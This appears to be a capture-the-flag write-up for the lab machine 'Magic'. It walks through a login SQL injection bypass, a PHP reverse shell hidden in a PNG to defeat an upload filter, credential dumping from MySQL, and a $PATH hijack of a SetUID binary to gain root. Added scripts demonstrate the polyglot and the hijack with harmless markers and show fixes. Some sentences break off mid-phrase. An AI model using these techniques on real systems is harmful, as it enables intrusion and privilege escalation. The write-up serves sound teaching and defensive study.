Jump Ahead: Enum – Initial Shell – User – Root
To solve this machine, we begin by enumerating exposed services, finding ports 22 and 80 open. On the webserver, we find a login form vulnerable to SQLi that redirects us to an image uploader. We smuggle a reverse shell onto the webserver inside an image and gain access as www-data. Looking around the machine, we find credentials that allow us to pillage the database, gaining the system password for the theseus user. Logging in as theseus, we enumerate our groups and the files we can access or run. We find /bin/sysinfo, which is owned by root and has the SetUID bit set. Exploiting a $PATH vulnerability in the binary allows us to hijack program execution and get a root shell. We now have access to read
Like all machines, we begin by enumerating exposed services using nmap, finding only ports 22 (SSH) and 80 (HTTP) open.

```text
$ nmap -v -p- --min-rate 3000 $RHOST
[...]
$ nmap -A -oA scans/nmap/tcp-all -p 22,80 $RHOST
# Nmap 7.80 scan initiated Sun Jun  7 12:56:15 2020 as: nmap -A -oA scans/nmap/tcp-all -p 22,80 10.10.10.185
Nmap scan report for 10.10.10.185
Host is up (0.047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun  7 12:56:24 2020 -- 1 IP address (1 host up) scanned in 9.22 seconds
```
Next, we enumerate the web server using gobuster and find a few files we have access to read.

```text
$ gobuster dir -u 10.10.10.185 -w /opt/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt -o scans/web/gobuster80-rmf.txt
[...]
/login.php (Status: 200)
/index.php (Status: 200)
/. (Status: 200)
```
Navigating to http://10.10.10.185/login.php, we are presented with a login form. We try the traditional ' or 1=1-- SQL injection string, but notice that the input field does not allow spaces to be typed. This is a client-side restriction only, so we bypass it by copying and pasting the string into the field. For conciseness, we put it in both the username and password fields. After clicking "Login", we are redirected to an image upload page.
Although the upload form states "Select Image to Upload", we attempt to upload a .php file to see whether uploading a reverse shell would be straightforward. The upload is denied with an error message stating that only JPG, JPEG, and PNG files are allowed.
To evade this filter (likely a MIME-type check on the file's leading bytes), we smuggle our reverse shell inside a valid image: we cat the reverse shell onto the end of the image and save the result to a new file. For the webserver to execute the PHP, the file name must also contain a .php extension, so we keep .png as the final extension to satisfy the filter and place .php before it.

```text
### revshell.php is just the laudanum php-reverse-shell.php
$ cat kittens.png revshell.php > shellme.php.png
```
Next, we try to upload the new file, which proves successful.
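The following is an added example, not code from the write-up: it rebuilds the image/PHP polyglot described above and runs it through two upload filters, the permissive one the form appears to implement and a safer server-side rule. The "image" is a constructed 8-byte PNG signature standing in for kittens.png, and the payload is a harmless marker standing in for the reverse shell; the function names and the temporary-directory layout are mine.

```shell
#!/bin/sh
# Added example (not the author's code): rebuild the image/PHP polyglot and
# check it against two upload filters. kittens.png is replaced by a constructed
# PNG signature; revshell.php by a one-line marker.

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Constructed inputs: the PNG signature \x89PNG\r\n\x1a\n, and a trivial PHP file.
printf '\211PNG\r\n\032\n' > "$WORK/kittens.png"
printf '<?php echo "payload"; ?>\n' > "$WORK/revshell.php"
cat "$WORK/kittens.png" "$WORK/revshell.php" > "$WORK/shellme.php.png"

# First four bytes of a file as lowercase hex, e.g. 89504e47 for PNG.
magic_hex() {
  head -c 4 "$1" | od -An -tx1 | tr -d ' \n'
}

# The filter the upload form appears to implement: the name must end in an
# image extension and the content must start with PNG or JPEG magic bytes.
# shellme.php.png satisfies both, which is why the upload went through.
naive_filter() {
  case "$1" in
    *.png|*.jpg|*.jpeg) ;;
    *) echo REJECT; return 0 ;;
  esac
  case "$(magic_hex "$1")" in
    89504e47|ffd8ff*) echo ACCEPT ;;
    *) echo REJECT ;;
  esac
}

# A safer server-side rule: discard the client-supplied name entirely, derive
# the extension from the detected type and use an opaque base name, so no
# ".php" segment ever lands under the web root. Apache's mod_mime applies
# AddHandler to every extension of a multi-dotted name, so "x.php.png" is
# handed to PHP even though its last extension is .png.
safe_store_name() {
  case "$(magic_hex "$1")" in
    89504e47) ext=png ;;
    ffd8ff*)  ext=jpg ;;
    *) echo REJECT; return 0 ;;
  esac
  # cksum stands in for a random token; it is POSIX and needs no extra tools.
  echo "upload_$(cksum < "$1" | cut -d' ' -f1).$ext"
}

echo "naive filter on shellme.php.png: $(naive_filter "$WORK/shellme.php.png")"
echo "stored as: $(safe_store_name "$WORK/shellme.php.png")"
```

Renaming alone only stops the file from being executed; the PHP bytes are still inside the stored image, so a service that cares should also re-encode uploads with an image library, which discards trailing data.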
To execute the reverse shell, we return to the webserver's index page and look through its source for the directory from which uploaded images are served. One path we see is images/uploads/, which is likely where our file was stored. We start a netcat listener and navigate to http://10.10.10.185/images/uploads/shellme.php.png, which gives us a reverse shell as the www-data user.
To make things a little easier, we upgrade to a Meterpreter reverse shell.
Having gained access to the webserver, we begin enumeration. From the /home directory, we see that theseus is a valid system user. Looking at the webserver files in /var/www/Magic, we find database credentials for the theseus user. Running netstat from our Meterpreter shell, we also see that MySQL is listening only on localhost. To make it easy to connect to the database server, we create a port forward through Meterpreter.
Once our port forward is in place, we use the discovered credentials to connect to the database. Once connected, we list the tables, then dump the login table.

```text
$ mysql -h 127.0.0.1 -u theseus -p Magic
MySQL> show tables;
MySQL> select * from login;
```
Doing so, we get another potential password. Trying the password on the system, we are able to log in as theseus. We now have access to read
Having gained access to the machine as theseus, we begin enumeration by checking our groups with id. Doing so, we see that we are part of a group called users. Next, we search for files belonging to this group. Doing so, we find /bin/sysinfo, which is owned by root, group-owned by users, and has the SetUID bit set.

```text
$ find / -group users -ls 2>/dev/null
```
Running the binary, we see output similar to running systeminfo on Windows. Next, we want to see the library calls the binary makes, so we run it under ltrace. There is a lot of output, but we can see that the binary runs other programs on the system via popen(). To cut back on the noise, we pipe the output through grep to show only those calls. Doing so, we see 4 programs that /bin/sysinfo runs.
As none of the 4 programs is called with an absolute path, the shell spawned by popen() resolves each name through our $PATH, so we can hijack execution. We prepend our current directory to $PATH, upload a reverse shell to that directory, and name it after one of the binaries. Running /bin/sysinfo then executes our file in place of the intended program, and because the binary is SetUID root, our reverse shell runs as root. Once our reverse shell runs, we will have access to

```text
# Upload reverse shell to your current working directory
$ export PATH=$(pwd):$PATH
$ /bin/sysinfo
```

For my binary, I chose to hijack cat, as my reverse shell was a Meterpreter payload, which takes command-line options and would not have run correctly in place of the other candidates.
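The following is an added example, not code from the write-up: a constructed stand-in for a program that spawns helpers by bare name, the way /bin/sysinfo reaches cat through popen(), hijacked exactly as above, beside a hardened stand-in that resets PATH before spawning. Meterpreter is replaced by a one-line script that prints a marker; the script names and temporary directory are mine, and nothing here is SetUID, so the demonstration only shows which binary gets executed, not the privilege gain.

```shell
#!/bin/sh
# Added example (not the author's code): $PATH hijacking of a program that
# calls "cat" by bare name, and the same program with PATH pinned.

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

printf 'real content\n' > "$WORK/sample.txt"

# Vulnerable stand-in: popen("cat ...") runs "/bin/sh -c 'cat ...'", and sh
# resolves the bare name through whatever PATH the caller inherited.
cat > "$WORK/sysinfo_vuln.sh" <<'EOF'
#!/bin/sh
cat "$1"
EOF

# Hardened stand-in: reset PATH to trusted directories before spawning.
# Calling the helper by absolute path (e.g. /bin/cat) closes the hole too.
cat > "$WORK/sysinfo_fixed.sh" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
cat "$1"
EOF

# Attacker's fake "cat", dropped in a directory the attacker controls.
cat > "$WORK/cat" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
chmod 755 "$WORK/sysinfo_vuln.sh" "$WORK/sysinfo_fixed.sh" "$WORK/cat"

# Same manoeuvre as the write-up: our directory leads PATH, then run the target.
run_vuln() {
  PATH="$WORK:$PATH" "$WORK/sysinfo_vuln.sh" "$WORK/sample.txt"
}

# Identical environment, but the hardened target ignores the inherited PATH.
run_fixed() {
  PATH="$WORK:$PATH" "$WORK/sysinfo_fixed.sh" "$WORK/sample.txt"
}

echo "vulnerable: $(run_vuln)"
echo "hardened:   $(run_fixed)"
```

The check to run against any SetUID binary you find is the one the write-up uses: trace it (ltrace, or strace -f -e execve) and look for popen()/system() arguments that begin with a bare command name rather than a slash.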
Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!